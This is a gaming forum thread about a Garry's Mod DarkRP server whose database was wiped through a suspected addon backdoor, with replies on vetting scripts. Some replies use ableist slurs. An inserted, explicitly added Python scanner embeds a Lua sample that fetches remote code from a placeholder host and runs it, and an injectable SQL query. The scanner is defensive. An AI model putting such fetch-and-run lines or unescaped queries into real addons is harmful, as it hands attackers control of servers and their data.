Good morning Facepunch Community,
Earlier this morning one of our servers, DarkRP, was targeted by an unknown exploit or script backdoor that wiped every table in our db. Now, according to the sources that I have spoken with, together with others who have been affected by this attack, I highly recommend people back up their servers; this includes but is not limited to the following.
- sv.db
- Mysql db's
- Data folder
- Addons
Over the past few months servers have been attacked left and right by the "cheat group" known as odium. The attacks have ranged from spamming servers to purchase said cheat, to attacking Steam groups en masse with Steam accounts to advertise said cheat, and now utilizing known and unknown backdoors/exploits to attack servers. This group has caused enough damage and I believe something needs to be done about it, along with many others who have unfortunately been victimized by this group.
Go to 11:15 to view the backdoor menu in action
[video]https://youtu.be/o514Mxpu0Kg?t=678[/video]
Anyone who has more information regarding this issue please post, it would be greatly appreciated.
This is a clear cut case of a server side code execution exploit gone off the charts, basically they either have a backdoor in your server or you have an addon/piece of code that contains exploits allowing them to run the code on your server. This isn't an exploit in Garry's Mod itself (that'd be very very unlikely at least), but rather with an addon or piece of scripting you've got installed.
Once they get to run 1 line of code on your server, they can do whatever the fuck they want to it from that point on.
Your server has got a lot of custom content and a wide range of scripts, correct? That's where you should begin looking at least.
@Author, the video I provided isn't from my server. That is a video that I was given as an example of what they are using.
I fully understand it is most likely an addon they are exploiting, and I will find the issue in due time. This thread is designed to give a formal warning for others, so they understand the severity of the issue.
this is a backdoor
and the reason why you don't give random people access to rcon or run their lua
No. ( to op )
Seriously how are big server owners believing the most autistic shit
All you're doing is scaring other server owners that aren't that informed
There's a reason that custom coded servers like superior never get hit with an in-game exploit
Stop it
[QUOTE=Kevlon;52315517]No. ( to op )
Seriously how are big server owners believing the most autistic shit[/QUOTE]
because they have no brain and their server is developed by some retard on gmodstore
[QUOTE=Jelman;52315546]because they have no brain and their server is developed by some retard on gmodstore[/QUOTE]
Or better yet looked up some YouTube video recorded with Bandicam on how to setup a basic DarkRP server and how to install scripts, then went on a Gmod Store spending spree.
Please let us know if you find anything. This is a serious issue which needs to be sorted as soon as possible.
Writing this at 4:30am.
So every single server that ever bought a script is a retarded server lol? Last time I checked that is how all, if not most, of every community starts.
So you're okay with exploits and shit like this existing just because they are paid scripts on a script fodder website, and god forbid someone uses them, they are a shit server???? Please explain, we should definitely be showing awareness of this at least so it might be fixed and/or the addon removed if found.
ʇsǝuıɟ sʇı ʇɐ ɯsıʇnɐ
[QUOTE=Stooge2;52315605]Writing this at 4:30am.
So every single server that ever bought a script is a retarded server lol? Last time I checked that is how all, if not most, of every community starts.
So you're okay with exploits and shit like this existing just because they are paid scripts on a script fodder website, and god forbid someone uses them, they are a shit server???? Please explain, we should definitely be showing awareness of this at least so it might be fixed and/or the addon removed if found.
ʇsǝuıɟ sʇı ʇɐ ɯsıʇnɐ[/QUOTE]
No, it's not retarded. Buying scripts off Gmod Store is no problem. However, if you are going to be buying scripts from someone else, at the VERY LEAST check the code for any backdoors etc. You didn't code the script, therefore it could potentially have dodgy stuff in it. If you want to run a server without backdoors and problems etc, then learn how to do some programming and learn how to read code -- instead of whining that your server got backdoored.
[QUOTE=skytron;52315615]No, it's not retarded. Buying scripts off Gmod Store is no problem. However, if you are going to be buying scripts from someone else, at the VERY LEAST check the code for any backdoors etc. You didn't code the script, therefore it could potentially have dodgy stuff in it. If you want to run a server without backdoors and problems etc, then learn how to do some programming and learn how to read code -- instead of whining that your server got backdoored.[/QUOTE]
Most scripts from GmodStore don't have backdoors since the mods manually check each addon for backdoors. OP most likely got infected by a workshop addon.
[QUOTE=skytron;52315615]No, it's not retarded. Buying scripts off Gmod Store is no problem. However, if you are going to be buying scripts from someone else, at the VERY LEAST check the code for any backdoors etc. You didn't code the script, therefore it could potentially have dodgy stuff in it. If you want to run a server without backdoors and problems etc, then learn how to do some programming and learn how to read code -- instead of whining that your server got backdoored.[/QUOTE]
That is a fair point. But it doesn't mean the lower grade servers who are trying to make servers should be punished just because they don't know what to look for when skimming over an addon. Not everyone was born a genius.
I think it's unfair to label them as retarded, more so inexperienced.
[QUOTE=ThatLing;52315622]Most scripts from GmodStore don't have backdoors since the mods manually check each addon for backdoors. OP most likely got infected by a workshop addon.[/QUOTE]
Yeah they do manually check each addon. No doubt about that. But everyone is human and may miss something. Or perhaps the mods didn't check properly. Who knows, it's still better to check the code rather than just dumping it on and trusting. And fully agree with you about the workshop addon.
[QUOTE=Stooge2;52315624]That is a fair point. But it doesn't mean the lower grade servers who are trying to make servers should be punished just because they don't know what to look for when skimming over an addon. Not everyone was born a genius.
I think it's unfair to label them as retarded, more so inexperienced.[/QUOTE]
It's not a matter of being a genius. Anyone can read, anyone can learn. It might take longer for some, but that doesn't change the fact that if the person has the capability of setting up a server, they have the capability of learning other things. Labeling them retarded isn't correct, more so inexperienced as you say.
If anyone has any info please post it here. We will be outreaching to different server owners to let them know.
Listen, the point remains the same: someone is taking advantage of an exploit or backdoor, and chances are it's a backdoor in a public addon. But the fact remains, no one knows what addon that may be. I will do everything in my power to find said addon and report it once I find it. It doesn't matter if you are the #1 DarkRP or if you are a small server owner who just started, people need to be informed as to what's going on around the Garry's Mod community; if you dislike that, I'm sorry.
[QUOTE=Corvezeo;52315677]Listen, the point remains the same: someone is taking advantage of an exploit or backdoor, and chances are it's a backdoor in a public addon. But the fact remains, no one knows what addon that may be. I will do everything in my power to find said addon and report it once I find it. It doesn't matter if you are the #1 DarkRP or if you are a small server owner who just started, people need to be informed as to what's going on around the Garry's Mod community; if you dislike that, I'm sorry.[/QUOTE]
Check all the third party workshop addons you're subscribed to in your collections and open them with gmad.
If any of those prop/model addons have random lua then it's likely that.
[QUOTE=Jelman;52315692]Check all the third party workshop addons you're subscribed to in your collections and open them with gmad.
If any of those prop/model addons have random lua then it's likely that.[/QUOTE]
I sometimes wish that people on FP would stop automatically assuming that the person making X post is autistic. In the rare occurrence that the person knows at least most of what they're doing, you're just hindering progress.
[QUOTE=ertug20;52315707]I sometimes wish that people on FP would stop automatically assuming that the person making X post is autistic. In the rare occurrence that the person knows at least most of what they're doing, you're just hindering progress.[/QUOTE]
My French friend's gmod server has been hacked! Everything is gone! We have been looking around and found that the org add-on has an SQL exploit! If anyone knows anyone that could contact gmodstore staff I'd appreciate it. His server has 50 players so that's why I'm making this thread btw.
SERVER OWNERS BEWARE ORGANIZATION ADD-ON HAS EXPLOIT
-> this is how dumb it'd sound if you knew what was causing it
(Based off real addon)
[QUOTE=Kevlon;52315760]My French friend's gmod server has been hacked! Everything is gone! We have been looking around and found that the org add-on has an SQL exploit! If anyone knows anyone that could contact gmodstore staff I'd appreciate it. His server has 50 players so that's why I'm making this thread btw.
SERVER OWNERS BEWARE ORGANIZATION ADD-ON HAS EXPLOIT
-> this is how dumb it'd sound if you knew what was causing it
(Based off real addon)[/QUOTE]
I understand your point of view and I also agree that it's best if you either make everything yourself or contact developers to make everything custom (much better for security and generally cancer free) but that isn't always the case.
I am also guilty of assuming that some clients aren't the most knowledgeable people until they give me a reason to change that, but surely if a top 10 GMod server (who should at least be assumed to know half of what they're doing) was having major issues along with many other reports, it should be a bit more concerning than just some random Frenchie server who uses leaked scripts.
[QUOTE=ertug20;52315807]I understand your point of view and I also agree that it's best if you either make everything yourself or contact developers to make everything custom (much better for security and generally cancer free) but that isn't always the case.
I am also guilty of assuming that some clients aren't the most knowledgeable people until they give me a reason to change that, but surely if a top 10 GMod server (who should at least be assumed to know half of what they're doing) was having major issues along with many other reports, it should be a bit more concerning than just some random Frenchie server who uses leaked scripts.[/QUOTE]
Idk what u mean because garnet also had it until I told him to remove it.
[QUOTE=Kevlon;52315816]Idk what u mean because garnet also had it until I told him to remove it.[/QUOTE]
Some are better than others I suppose. Maybe I'm just giving them too much credit. If there is truly no difference between a community who pushes past 100 and one that uses leaked scripts and rarely gets past 15 players then there is a bigger issue at hand.
[QUOTE=Kevlon;52315816]Idk what u mean because garnet also had it until I told him to remove it.[/QUOTE]
Yeah, this was the addon which resulted in my server having its database wiped circa 2014: (which Kevlon mentioned to me)
[url]https://www.gmodstore.com/scripts/view/393/organisations-addon-for-darkrp[/url]
It looks like it has been updated since, but it was on ScriptFodder for a period of well over 1 year with a backdoor. While ScriptFodder does have quality control, I'd safely say things go under the radar very frequently, e.g. a radio SWEP was used to crash a community called ICE back in the days when I staffed on it, and a "party" addon by, I believe, rocketmania affected tens of new GMod servers every day.
Are you sure you didn't piss off someone that you doxed, threatened or refused to pay? Like this is uncommon for you?
@nootnoot Can we keep comments to relevant posting, please. This thread isn't for posting irrelevant useless ranting.
[QUOTE=ertug20;52315707]I sometimes wish that people on FP would stop automatically assuming that the person making X post is autistic. In the rare occurrence that the person knows at least most of what they're doing, you're just hindering progress.[/QUOTE]
If he's posting like this and has been backdoored then who the fuck knows
[URL="http://steamcommunity.com/groups/gmodnexus"]GNEX[/URL] will save you
[QUOTE=scottd564;52315916][URL="http://steamcommunity.com/groups/gmodnexus"]GNEX[/URL] will save you[/QUOTE]
This is literally the definition of oligarchy and collusion. As much as I'd love to optimistically accept and fully see the "Big Server Men" conspiracy as pure irony, this just visualises how corruptively easy it is.
Lazy solution:
Log the queries that are being executed. At some point you're going to see a query that is obviously injected and then it won't be too hard to find the addon with the issue.
Smart Solution:
Look for any addons contacting a weird URL that then uses something like RunString or something. Or look for addons that don't escape queries. Run a test server with a test DB and try to reproduce it.
Also make sure you're not using generic passwords for your DBs and that your DBs are IP restricted (a while ago someone got my DB info off a site called haveibeenpwned or something and just accessed it through there).
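The "smart solution" above (look for addons that pull something from a URL and feed it to RunString, or that build sql.Query strings without escaping) and Jelman's tip about Lua hiding in prop/model packs can be turned into a quick triage scanner. The following is an added example, not code from anyone in this thread; the addon tree it scans is constructed inline, and the GMod Lua API names it looks for (RunString, CompileString, http.Fetch, http.Post, sql.Query, sql.SQLStr) are the real ones.

```python
import re

# Constructed sample addon tree (path -> Lua source); not from any real addon.
SAMPLE_ADDON = {
    "addons/props_pack/models/props/crate.mdl": "",
    "addons/props_pack/lua/autorun/server/init.lua":
        'http.Fetch("http://example.invalid/p.txt", function(b) RunString(b) end)',
    "addons/org_addon/lua/org/sv_db.lua":
        'sql.Query("UPDATE orgs SET name = \'" .. name .. "\' WHERE id = " .. id)',
    "addons/org_addon/lua/org/sv_safe.lua":
        'sql.Query("UPDATE orgs SET name = " .. sql.SQLStr(name)'
        ' .. " WHERE id = " .. sql.SQLStr(id))',
}

# Dynamic code loaders in the GMod Lua API, and the HTTP calls that feed them.
REMOTE_EXEC = re.compile(r"\b(RunString|CompileString)\s*\(")
NET_FETCH = re.compile(r"\bhttp\.(Fetch|Post)\s*\(")
# One-line sql.Query call; the argument text is captured for the escaping check.
SQL_CALL = re.compile(r"\bsql\.Query\s*\((.*)\)")

def scan_lua(src):
    """Return heuristic findings for one Lua source string."""
    findings = []
    # Fetching a remote body and handing it to RunString is the classic
    # "update server" backdoor shape this thread is about.
    if REMOTE_EXEC.search(src) and NET_FETCH.search(src):
        findings.append("remote code load")
    for m in SQL_CALL.finditer(src):
        arg = m.group(1)
        # Concatenated arguments with no sql.SQLStr() escaping are injectable
        # (heuristic: a call mixing escaped and raw values is not caught).
        if ".." in arg and "sql.SQLStr(" not in arg:
            findings.append("unescaped sql")
    return findings

def scan_addons(files):
    """Map each suspicious .lua path to its findings."""
    content_addons = {p.split("/")[1] for p in files
                      if "/models/" in p or "/materials/" in p}
    report = {}
    for path, src in files.items():
        if not path.endswith(".lua"):
            continue
        findings = scan_lua(src)
        # Jelman's tip above: Lua inside a prop/model pack is itself a red flag.
        if path.split("/")[1] in content_addons:
            findings.append("lua in content addon")
        if findings:
            report[path] = findings
    return report
```

To run it against a real install, build the dict by walking your addons folder (and the extracted output of gmad for workshop items) and reading each file; hits are leads to review by hand, not proof of a backdoor.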
The GMod Shadow Cabal must be stopped at any cost, just look at this leaked pitchdeck:
[url]https://docs.google.com/presentation/d/1UcAyYHw5-CJ692bWg7JDO0l3KwZjtyLQco2L5ixvRZE/edit#slide=id.g22a79d92c3_0_0[/url]
This is truly the weirdest timeline.
BEST SOLUTION: Delete SRCDS
As stated, probably caused by either leaked addons or shitty workshop addons with badly hidden backdoors that allow for serverside code execution with a concommand.